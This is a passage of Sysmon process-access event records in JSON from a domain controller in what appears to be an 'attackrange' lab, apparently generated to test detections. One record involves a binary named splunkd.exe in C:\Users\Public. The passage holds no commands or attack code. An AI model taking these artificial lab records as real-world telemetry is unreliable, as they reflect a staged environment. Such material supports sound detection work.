2020-08-01 06:50:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:24","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2857,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:24.365\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:24.365","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:24","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2858,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:24.365\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:24.365","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:24","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2859,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:24.365\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:24.365","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:24","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2860,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:24.365\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:24.365","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:24","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2861,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:24.365\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:24.365","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:24","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2862,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:24.365\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:24.365","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:24","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2863,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:24.365\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-10B0-5F25-0000-0010F5ED0400}\r\nTargetProcessId: 3832\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:24.365","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-10B0-5F25-0000-0010F5ED0400}","TargetProcessId":"3832","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:25","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2864,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:25.243\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:25.243","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:50:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
